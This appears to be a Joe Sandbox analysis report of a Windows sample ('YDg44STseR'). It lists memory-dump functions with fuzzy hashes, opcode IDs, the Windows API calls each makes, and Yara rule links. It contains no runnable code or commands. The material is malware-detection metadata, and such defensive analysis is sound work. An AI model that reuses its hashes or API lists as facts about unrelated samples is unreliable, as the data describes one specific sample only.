Instruction Fuzzy Hash: A95116B0D002188FEB59DFAAC8447DEBBF2AF89300F64C06AC458BB255DB314986CF54

Function 065D2DC8 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681615837.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65d0000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c02cc568c3daf1cef9225272f6c9d728e4b4938653739f909790a1005cd8d595
Instruction ID: d2f811d86893859c92803755fcbc1b18c955255938d73cd16cac721cbf4ba830
Opcode Fuzzy Hash: c02cc568c3daf1cef9225272f6c9d728e4b4938653739f909790a1005cd8d595
Instruction Fuzzy Hash: FA418AB1D016199BEB68CF6BCC4479EFAF3AFC9300F14C1A9D50CA6264DB740A868F51

Function 063B7FCF Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681378909.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63b0000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ff0b26f45b43cafd73412581720dd6f64e5afeb60130ae8e0916842415423e2
Instruction ID: cbd22320ffaacf83a195339e6549111b9bb0e4dc4fb1670877c9d7bf5160403e
Opcode Fuzzy Hash: 8ff0b26f45b43cafd73412581720dd6f64e5afeb60130ae8e0916842415423e2
Instruction Fuzzy Hash: 3C41C4B0D012088FEB58DFAAD8447DEBBF6AF89300F14D16AC528BB294DB754946CF54

Function 065D34B0 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681615837.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65d0000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abc3ba8868414a1079897847cfb90b0c71900bc713a4cbf7fe78b3a75014dd41
Instruction ID: 6ce67b298d5eb1488bd2fa88a9bb61e38744c0d454feea00feaeb94bede836dc
Opcode Fuzzy Hash: abc3ba8868414a1079897847cfb90b0c71900bc713a4cbf7fe78b3a75014dd41
Instruction Fuzzy Hash: 9A4188B1E016188BEB68CF5BCD4479EFAF3AFC9200F14C1A9D40CA6254EB750A868F51

Function 065D3B98 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681615837.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65d0000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6039a95e8a853aed7c7bab8ec89436e13835ac3c2b49865e342e361f9b356091
Instruction ID: b7081705fb0bacf28ba4714e5454aff3c9bf56c557d8472c9697b7c7f4375392
Opcode Fuzzy Hash: 6039a95e8a853aed7c7bab8ec89436e13835ac3c2b49865e342e361f9b356091
Instruction Fuzzy Hash: 094168B1E016189BEB68CF5BCC4479EFAF3AFC9200F14C1A9D40DA6254DB740986CF51

Function 065D4280 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681615837.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65d0000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 044ffd64f850bc47ed0a48c18c9ab48e4f57602040b392df44e987d835ee84b3
Instruction ID: 538e7420d47f1954c103ee5025f383692ee64b1ad69dfe8ebd95afe65f8ab585
Opcode Fuzzy Hash: 044ffd64f850bc47ed0a48c18c9ab48e4f57602040b392df44e987d835ee84b3
Instruction Fuzzy Hash: B04169B1E016289BEB68CF5BD94479EFAF3AFC9200F14C1A9C40CA6254DB7409868F51

Function 063B9407 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681378909.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63b0000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87e1c27d56e8ce54d8d108c05ddc1d4bff7deb4fd4611587b56c4aa89b466817
Instruction ID: 12d496d80991a447f58ee645108bd8ba564a71ceb39acfb3d6172984ebfbc06b
Opcode Fuzzy Hash: 87e1c27d56e8ce54d8d108c05ddc1d4bff7deb4fd4611587b56c4aa89b466817
Instruction Fuzzy Hash: 7741F570D012088BEB58DFAAD8506DEFBF6AF89300F20D029D519AB658DB345946CF90

Function 061C228A Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681315845.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61c0000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7330da472ac07808c5a98eece4bc9cb2b2b69ffdbf4f40de8f06e22b8b5b68f6
Instruction ID: 53e0f199aa291d2296da305d5f36a7d747340217ff23d452ab9fe0e0c56f9872
Opcode Fuzzy Hash: 7330da472ac07808c5a98eece4bc9cb2b2b69ffdbf4f40de8f06e22b8b5b68f6
Instruction Fuzzy Hash: F24168B1E016598BEB68CF6BC84479EFAF3AFC9300F14C1A9C40CA6254DB740A86CF51

Function 061CE07F Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681315845.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61c0000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c790e0ab7d00b54638da92d772b2e2c801be8e795b4d7b26eb88400e164c722
Instruction ID: cab1132d5346530361ea2c0ad1711f248372748fad3ebbdc934894b11f1ba34f
Opcode Fuzzy Hash: 5c790e0ab7d00b54638da92d772b2e2c801be8e795b4d7b26eb88400e164c722
Instruction Fuzzy Hash: E9411571E05248CFEB58DFAAD8446EEBBF2AF99310F24C129C418BB255DB344946CF90

Function 065D2006 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681615837.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65d0000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0743386e2e9fe0d120ac3ea541c4204376d12ab7b2ffa54dca7c69d839490a39
Instruction ID: b645fd78f36d9243e2d4eaba7e2125dd980bc35c03fdd180d4e25fcd93591449
Opcode Fuzzy Hash: 0743386e2e9fe0d120ac3ea541c4204376d12ab7b2ffa54dca7c69d839490a39
Instruction Fuzzy Hash: 14417AB1E016188BEB68CF5BC94479EFAF3AFC9200F04C1A9C50CA6254EB340A85CF51

Function 061CCF20 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681315845.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61c0000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebbae0c08e86e37d75ce9a66e32d1fa74be3e9ad06f3b0288064848658abde26
Instruction ID: 4cb4d0afea66fc8a74418581a2208a49c06027cd403ca5a9fa40b266be336e41
Opcode Fuzzy Hash: ebbae0c08e86e37d75ce9a66e32d1fa74be3e9ad06f3b0288064848658abde26
Instruction Fuzzy Hash: DB41E5B1D01208CFEB58DFAAD9406DEBBF2AF99310F24D42AC418AB259DB345946CF50

Function 06426711 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681430302.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6420000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01179d96d27720d376a82766c72eec56e71fae9e5d50966637ac38fd8253d40f
Instruction ID: 572b9cf4117610e78b0207c3584413662d3e7aacb2ae401ae357d138c4742617
Opcode Fuzzy Hash: 01179d96d27720d376a82766c72eec56e71fae9e5d50966637ac38fd8253d40f
Instruction Fuzzy Hash: 6A4105B0D012188BDB58DFAAD8543EEBBF2BF89300F60D02AD458BB254DB344942CF40

Function 064283C0 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681430302.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6420000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaff38fb4788167c27f26f20d8c4969d6baaad6213d7606cb065cf3a9225f821
Instruction ID: 192b2738de4145768923b5dbd4d86470cb7ae4d6fcec2a14559be3987ab9971e
Opcode Fuzzy Hash: eaff38fb4788167c27f26f20d8c4969d6baaad6213d7606cb065cf3a9225f821
Instruction Fuzzy Hash: 2941C370D002198FDB98DFAAD9546EEBBF2BF88300F60D16AC419BB254EB354946CF54

Function 064521B0 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681506786.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6450000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 717729e8ff148baef8a112e513aa178b1d2e5862f3a26d01ddecf8526efa8928
Instruction ID: fcd55dc512c6bc2de73edc8044674c37b106b5515f0b9ae50d5f20ad03e3660c
Opcode Fuzzy Hash: 717729e8ff148baef8a112e513aa178b1d2e5862f3a26d01ddecf8526efa8928
Instruction Fuzzy Hash: 8341F475D012188BEB98DFAAD8547EEBBF2BF89300F14D06AC419BB255DB345A42CF40

Function 061C297A Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681315845.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61c0000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abd1ccd7ae6285641a3028efaccbe150181b18e93a60b93a2e406a8b1b1e8353
Instruction ID: 09b20428fc1f1808fe1a90f006dbd0e6aeea0bedfc3549a9e3bf846e929b398d
Opcode Fuzzy Hash: abd1ccd7ae6285641a3028efaccbe150181b18e93a60b93a2e406a8b1b1e8353
Instruction Fuzzy Hash: EE41F474D01248CFEB58DFAAD5446ADBBF2AF88300F24D029D419AB358DB344945CF44

Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(?), ref: 00401906
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
GetLastError.KERNEL32 ref: 00401940
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980

Memory Dump Source

Source File: 00000000.00000002.2675699764.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2675677842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2675727533.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2675750699.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2675750699.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2675750699.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2675823153.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_YDg44STseR.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

Function 065DCAF0 Relevance: 6.1, APIs: 4, Instructions: 142
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 065DCB7E
GetCurrentThread.KERNEL32 ref: 065DCBBB
GetCurrentProcess.KERNEL32 ref: 065DCBF8
GetCurrentThreadId.KERNEL32 ref: 065DCC51

Memory Dump Source

Source File: 00000000.00000002.2681615837.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65d0000_YDg44STseR.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: d21d3ab6295a31c5866e3e040d8ca3298cfe9be8628b6b0df92bfb3de2f4082c
Instruction ID: 7ae92c10c6efeda909acc2923093529102174f1aec44a7a3bf4905bf68778b56
Opcode Fuzzy Hash: d21d3ab6295a31c5866e3e040d8ca3298cfe9be8628b6b0df92bfb3de2f4082c
Instruction Fuzzy Hash: 7B5178B09003498FEB54DFA9C948BAEBBF5FF88314F208459D419A72A0DB749944CF65

Function 065DCB00 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 065DCB7E
GetCurrentThread.KERNEL32 ref: 065DCBBB
GetCurrentProcess.KERNEL32 ref: 065DCBF8
GetCurrentThreadId.KERNEL32 ref: 065DCC51

Memory Dump Source

Source File: 00000000.00000002.2681615837.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65d0000_YDg44STseR.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 46ee5b216f51f80d138369981a4fe5a1a900a1467672cb6da2f4bc76ee37e214
Instruction ID: 9be2421d3f9c8d6480b041bba2acc21fd855f765d98457cdce2bd763d6c717d2
Opcode Fuzzy Hash: 46ee5b216f51f80d138369981a4fe5a1a900a1467672cb6da2f4bc76ee37e214
Instruction Fuzzy Hash: E15145B09003498FEB54DFAAC948B9EBBF5FB88314F208419E519A73A0DB749944CF65

Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 0040AF80

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3

Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08

std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
__CxxThrowException@8.LIBCMT ref: 0040AFC5

Memory Dump Source

Source File: 00000000.00000002.2675699764.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2675677842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2675727533.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2675750699.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2675750699.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2675750699.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2675823153.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_YDg44STseR.jbxd

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1411284514-0
Opcode ID: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
Opcode Fuzzy Hash: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

Function 02146C47 Relevance: 2.6, Strings: 2, Instructions: 87
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LS, xrefs: 02146D02
LS, xrefs: 02146D1A

Memory Dump Source

Source File: 00000000.00000002.2676669397.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_YDg44STseR.jbxd

Similarity

API ID:
String ID: LS$LS
API String ID: 0-1695748509
Opcode ID: 6da2c15ce6a81a25b7a0e9c3adbd17c434bafc5cccc9cad7f6e7aba4f223f2bd
Instruction ID: 68a06698811b995af12a5efac76f71135fc556302c70c63cb7f1c33c72123537
Opcode Fuzzy Hash: 6da2c15ce6a81a25b7a0e9c3adbd17c434bafc5cccc9cad7f6e7aba4f223f2bd
Instruction Fuzzy Hash: D12136307483854FD715ABB598A06AA3FFAAFC611870444A9C585CF296EF32CC06C790

Function 06C24AF8 Relevance: 1.7, APIs: 1, Instructions: 208
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 06C24D5E

Memory Dump Source

Source File: 00000000.00000002.2681846566.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c20000_YDg44STseR.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f10eb774872a3d2642636ee4eed6ae59ade771cf5939ee5f31ab2766d151bb85
Instruction ID: 08d13834d6d38c95f526405f995879e81492c7968f1453ff7d9057cbd0522c56
Opcode Fuzzy Hash: f10eb774872a3d2642636ee4eed6ae59ade771cf5939ee5f31ab2766d151bb85
Instruction Fuzzy Hash: BE815970A00B169FD768DF29D44475ABBF5FF88300F008A2DD896D7A50DB74E949CB90

Function 06C270E4 Relevance: 1.6, APIs: 1, Instructions: 119
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06C27202

Memory Dump Source

Source File: 00000000.00000002.2681846566.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c20000_YDg44STseR.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: bfb9d6bfed8b2e52abf771cc16f7d4d0646dc7f4bd29f761a3e84dfa773a50ca
Instruction ID: a17c1f13194b5ee40ffe47a024a8f1d6daea41adf364824ccf3a7a03ac1be00b
Opcode Fuzzy Hash: bfb9d6bfed8b2e52abf771cc16f7d4d0646dc7f4bd29f761a3e84dfa773a50ca
Instruction Fuzzy Hash: D651ADB1D00359DFDB14CF9AC884ADEBBB5FF88310F64852AE819AB210D7759985CF90

Function 06C270F0 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06C27202

Memory Dump Source

Source File: 00000000.00000002.2681846566.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c20000_YDg44STseR.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 413c1d761c3ad22f6d735f9d45540395a9012268ea9d09d3615090890cca9e3b
Instruction ID: f98dbddbdf3ebb07182ac930421c88da569b4d747a53b7b7ccda028d23c8f215
Opcode Fuzzy Hash: 413c1d761c3ad22f6d735f9d45540395a9012268ea9d09d3615090890cca9e3b
Instruction Fuzzy Hash: 6D419EB1D00359DFDB14CF9AC884ADEBBB5BF88310F64812AE819AB250D7759985CF90

Function 06C2533C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 06C29771

Memory Dump Source

Source File: 00000000.00000002.2681846566.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c20000_YDg44STseR.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: d37a37d66b0899774aa0d98e3efdc66f91098de9f5c6a39c0f63a8e2b3a97c62
Instruction ID: 3b575b26f01862657f447b10fc37027aff91caae3076bd749365e3606afea03b
Opcode Fuzzy Hash: d37a37d66b0899774aa0d98e3efdc66f91098de9f5c6a39c0f63a8e2b3a97c62
Instruction Fuzzy Hash: 16415DB8900316CFDB54DF9AC888AAABBF5FF88710F24C459D519A7321D734A841CFA0

Function 065DCD40 Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 065DCDCF

Memory Dump Source

Source File: 00000000.00000002.2681615837.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65d0000_YDg44STseR.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b39243fd49d098f47603d6b4227ac7a21bba8dccc9d16e0ee0047b406760b20b
Instruction ID: 92afcd4c7e1c39b3d29c941e602698b5f1f298c700f96360ce911e0019b2bb2b
Opcode Fuzzy Hash: b39243fd49d098f47603d6b4227ac7a21bba8dccc9d16e0ee0047b406760b20b
Instruction Fuzzy Hash: C621F6B58002489FDB10CF9AD885ADEBFF8FB48320F14801AE954A3250D374A944CFA1

Function 065DCD48 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 065DCDCF

Memory Dump Source

Source File: 00000000.00000002.2681615837.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65d0000_YDg44STseR.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6a095f26c9d840a19bb8d69d35dc82e1036250b19f67a93bc7ceef55165c7284
Instruction ID: 163861ef18359af649e40e6efdb31582413c9e583c5971f89389710174a48a04
Opcode Fuzzy Hash: 6a095f26c9d840a19bb8d69d35dc82e1036250b19f67a93bc7ceef55165c7284
Instruction Fuzzy Hash: B521E3B59002499FDB10CFAAD884ADEBFF8FB48320F14801AE954A3350D374A954CF64

Function 061C9BBF Relevance: 1.6, APIs: 1, Instructions: 62
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 061C9D01

Memory Dump Source

Source File: 00000000.00000002.2681315845.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61c0000_YDg44STseR.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bcf7b80dcde108796c96afe171a1932308a9da4e450b1700f0fe6b04a897da2
Instruction ID: f5b853ace90a70e2fe2d40a2abc96fd6b9c9ae891a13fd7e673760adcd8949a3
Opcode Fuzzy Hash: 4bcf7b80dcde108796c96afe171a1932308a9da4e450b1700f0fe6b04a897da2
Instruction Fuzzy Hash: 7F116AB4E002098FEB54DBE9D884AADB7F5FB98324F148929E808E7351D730DC41CB64

Function 06C24CF8 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 06C24D5E

Memory Dump Source

Source File: 00000000.00000002.2681846566.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c20000_YDg44STseR.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b5a76d4cc0869ac280d7b8215bd19f7340a9c3bfaa6f1e70110af546546b313e
Instruction ID: 6449c39c8b74e4da81beafe2c3ccd0f4e1076e19e432d8769085def237d2533f
Opcode Fuzzy Hash: b5a76d4cc0869ac280d7b8215bd19f7340a9c3bfaa6f1e70110af546546b313e
Instruction Fuzzy Hash: CB1110B5C0034A8FDB24CF9AD844BDEFBF4EB88320F10841AD818A7210D378A545CFA1

Function 00401870 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80

SysAllocString.OLEAUT32 ref: 00401898

Memory Dump Source

Source File: 00000000.00000002.2675699764.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2675677842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2675727533.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2675750699.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2675750699.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2675750699.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2675823153.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_YDg44STseR.jbxd

Similarity

API ID: AllocString_malloc
String ID:
API String ID: 959018026-0
Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA

Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549

Memory Dump Source

Source File: 00000000.00000002.2675699764.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2675677842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2675727533.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2675750699.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2675750699.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2675750699.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2675823153.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_YDg44STseR.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548

Function 021489A8 Relevance: .7, Instructions: 692COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2676669397.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_YDg44STseR.jbxd

Similarity

